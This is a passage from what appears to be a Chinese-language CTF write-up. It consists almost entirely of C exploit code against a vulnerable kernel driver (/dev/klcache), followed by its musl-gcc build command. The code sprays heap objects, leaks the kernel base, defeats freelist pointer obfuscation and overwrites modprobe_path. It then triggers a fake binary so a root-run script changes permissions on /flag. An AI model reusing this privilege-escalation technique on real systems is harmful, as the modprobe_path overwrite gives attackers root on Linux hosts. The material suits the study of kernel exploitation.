if ((victim_fd = open("/tmp/victim", O_CREAT | O_RDWR, 0777)) < 0) {
err_exit("victim", 1);
}
char cmd[] = "#!/bin/sh\nchmod 777 /flag\n";
if (write(victim_fd, cmd, strlen(cmd)) < 0) {
err_exit("write", 1);
}
close(victim_fd);
struct dnotify_struct buf;
for (int i=0; i<OBJ_SPRAY_NR; ++i) {
dev_add(&buf);
}
for (int i=0; i<OBJ_SPRAY_NR; ++i) {
dev_delete(i);
}
int stat_fd[NR_STAT];
for (int i=0; i<NR_STAT; ++i) {
if ((stat_fd[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
err_exit("stat", 1);
}
}
for (int i=0; i<OBJ_SPRAY_NR; ++i) {
size_t tmpbuf[4];
dev_show(i, &tmpbuf);
if (tmpbuf[0] > KERNEL_BASE_0) {
kernel_base = tmpbuf[0] - (0xffffffff81479670ULL - KERNEL_BASE_0);
goto out;
}
}
for (int i=0; i<NR_STAT; ++i) {
close(stat_fd[i]);
}
err_exit("Exhausted.", 0);
out:
printf("[\x1b[32;1m+\x1b[0m] Kernel Base: 0x%016lx\n", kernel_base);
close(dev_fd);
dev_fd = open("/dev/klcache", O_RDWR);
if (dev_fd < 0) {
err_exit("error opening /dev/klcache", 1);
}
dev_add(&buf);
dev_add(&buf);
dev_add(&buf);
dev_delete(0);
dev_delete(1);
dev_delete(2);
if ((dir_fd_1 = open("/tmp", O_RDONLY)) < 0) err_exit("1st open", 1);
if (fcntl(dir_fd_1, F_NOTIFY, DN_MODIFY) < 0) err_exit("1st fcntl", 1);
if ((dir_fd_2 = open("/tmp", O_RDONLY)) < 0) err_exit("2nd open", 1);
if (fcntl(dir_fd_2, F_NOTIFY, DN_MODIFY) < 0) err_exit("2nd fcntl", 1);
if ((dir_fd_3 = open("/tmp", O_RDONLY)) < 0) err_exit("3rd open", 1);
if (fcntl(dir_fd_3, F_NOTIFY, DN_MODIFY) < 0) err_exit("3rd fcntl", 1);
size_t orig_buf_0[4];
size_t orig_buf_1[4];
size_t orig_buf_2[4];
dev_show(0, &orig_buf_0);
dev_show(1, &orig_buf_1);
dev_show(2, &orig_buf_2);
dev_delete(2);
dev_delete(1);
dev_delete(0);
show_and_dump(0);
show_and_dump(1);
show_and_dump(2);
size_t buf0[4];
size_t buf1[4];
size_t buf2[4];
dev_show(0, &buf0);
dev_show(1, &buf1);
dev_show(2, &buf2);
printf("[\x1b[34;1m*\x1b[0m] swab64(0x%016lx) = 0x%016lx\n", 0x1145141919, swab64(0x1145141919));
rnd = swab64(buf0[0]+16) ^ buf1[0] ^ buf1[2];
printf("[\x1b[32;1m+\x1b[0m] rnd = 0x%016lx\n", rnd);
printf("[\x1b[32;1m+\x1b[0m] buf1.next = 0x%016lx\n", rnd ^ swab64(buf1[0]+16) ^ buf2[2]);
dev_delete(1);
size_t buf3[4];
size_t modprobe_path = kernel_base + (MODPROBE_PATH - KERNEL_BASE_0);
buf3[2] = rnd ^ swab64(buf0[0]+16) ^ modprobe_path;
dev_add(&buf3);
dev_add(&buf);
dev_add(&buf);
char buf6[32];
strcpy(buf6, "/tmp/victim");
dev_add(&buf6);
system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");
system("chmod +x /tmp/fake");
system("/tmp/fake");
printf("[\x1b[34;1m*\x1b[0m] Granting read permission for /flag.\n");
return 0;
}
编译:
musl-gcc -no-pie -z now -o exp_dnotify exp_dnotify.c -masm=intel -static
- References